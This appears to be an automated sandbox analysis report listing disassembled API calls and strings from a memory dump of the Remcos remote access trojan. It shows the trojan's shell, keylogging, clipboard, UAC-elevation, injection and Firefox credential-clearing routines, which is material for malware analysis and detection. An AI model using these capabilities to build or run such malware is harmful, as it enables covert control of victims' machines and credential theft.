                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B561
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B568
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                                                                                                                                                                                                                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                                                                                                                                                                                                                                • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                                                                                                                                                                                                                                • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                                                                                                                                                                                                                                                • API String ID: 2918587301-599666313
                                                                                                                                                                                                                                                                                                • Opcode ID: fe774ec57ea4c9c98434e9a8a4b205946b127d152570ca2712e415059fb31443
                                                                                                                                                                                                                                                                                                • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe774ec57ea4c9c98434e9a8a4b205946b127d152570ca2712e415059fb31443
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                                                                                                                                                                                                                                • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                                                                                                                                                                                                                                                                • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                                                                                                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                                                                                                                                                                                                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32 ref: 004053CD
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32 ref: 004053D5
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32 ref: 004053E7
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32 ref: 004053EF
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                                                                                                                                                                                                • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                                                                                                                                                                                                                                                                • API String ID: 3815868655-81343324
                                                                                                                                                                                                                                                                                                • Opcode ID: bfcb8ec680749e1ff3d96b83f6722c7489f5814a8e376730b38478a1694e7e9c
                                                                                                                                                                                                                                                                                                • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bfcb8ec680749e1ff3d96b83f6722c7489f5814a8e376730b38478a1694e7e9c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                                                                                                                                                                                                                                • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                                                                                                                                                                                                                                • API String ID: 65172268-860466531
                                                                                                                                                                                                                                                                                                • Opcode ID: d192d8a590ecce51a9812f84f69104631043a8cd194a5600cb3b3bff2e47a3d7
                                                                                                                                                                                                                                                                                                • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d192d8a590ecce51a9812f84f69104631043a8cd194a5600cb3b3bff2e47a3d7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                                                                                                                                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                                                                                                                                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                                                                                                                                                                                                • API String ID: 1164774033-3681987949
                                                                                                                                                                                                                                                                                                • Opcode ID: 012abd7bd482f24294ec220c5f3416e7c12077f4aefc2c6d47742caa5bc96ad8
                                                                                                                                                                                                                                                                                                • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 012abd7bd482f24294ec220c5f3416e7c12077f4aefc2c6d47742caa5bc96ad8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                                                                                                                                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Find$Close$File$FirstNext
                                                                                                                                                                                                                                                                                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                                                                                                                                                • API String ID: 3527384056-432212279
                                                                                                                                                                                                                                                                                                • Opcode ID: eec28e5122cf95747afd0231d26089d1190572cbd646818cfb2ab67d48c7021b
                                                                                                                                                                                                                                                                                                • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eec28e5122cf95747afd0231d26089d1190572cbd646818cfb2ab67d48c7021b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                                                                                                                                                                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                                                                                                                                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                                                                                                                                                                                                                • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                                                                                                                                                                                                                                • API String ID: 726551946-3025026198
                                                                                                                                                                                                                                                                                                • Opcode ID: 2298112d5e9beca4c64cadb89c7e546d0899f31810f4b1b50fdabc55d78eae7e
                                                                                                                                                                                                                                                                                                • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2298112d5e9beca4c64cadb89c7e546d0899f31810f4b1b50fdabc55d78eae7e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • OpenClipboard.USER32 ref: 004159C7
                                                                                                                                                                                                                                                                                                • EmptyClipboard.USER32 ref: 004159D5
                                                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                                                                                                                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 00415A5A
                                                                                                                                                                                                                                                                                                • OpenClipboard.USER32 ref: 00415A61
                                                                                                                                                                                                                                                                                                • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 00415A89
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3520204547-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 5bf6c0a188ebc9cd77caef7c6d8a55023eea9b799c8747cd0bf31199529283f8
                                                                                                                                                                                                                                                                                                • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5bf6c0a188ebc9cd77caef7c6d8a55023eea9b799c8747cd0bf31199529283f8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 0$1$2$3$4$5$6$7
                                                                                                                                                                                                                                                                                                • API String ID: 0-3177665633
                                                                                                                                                                                                                                                                                                • Opcode ID: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                                                                                                                                                                                                                                                                • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 00409B3F
                                                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                                                                                                                                                                                                • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 00409B67
                                                                                                                                                                                                                                                                                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                                                                                                                                                                                                                • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                                                                                                                                                                                                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                                                                                                                                                                                                • String ID: 8[G
                                                                                                                                                                                                                                                                                                • API String ID: 1888522110-1691237782
                                                                                                                                                                                                                                                                                                • Opcode ID: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                                                                                                                                                                                                                                                                • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00406788
                                                                                                                                                                                                                                                                                                • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Object_wcslen
                                                                                                                                                                                                                                                                                                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                                                                                                                                                                                                • API String ID: 240030777-3166923314
                                                                                                                                                                                                                                                                                                • Opcode ID: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                                                                                                                                                                                                                                                                • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                                                                                                                                                                                                                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00419935
                                                                                                                                                                                                                                                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3587775597-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 46cfc2a1174990e4b59b9ee5729c715e61cf9958b22909a5f2789daa8df81af0
                                                                                                                                                                                                                                                                                                • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 46cfc2a1174990e4b59b9ee5729c715e61cf9958b22909a5f2789daa8df81af0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                                                                                                                                                                                                                                                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
                                                                                                                                                                                                                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                                                                                                                                                                                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
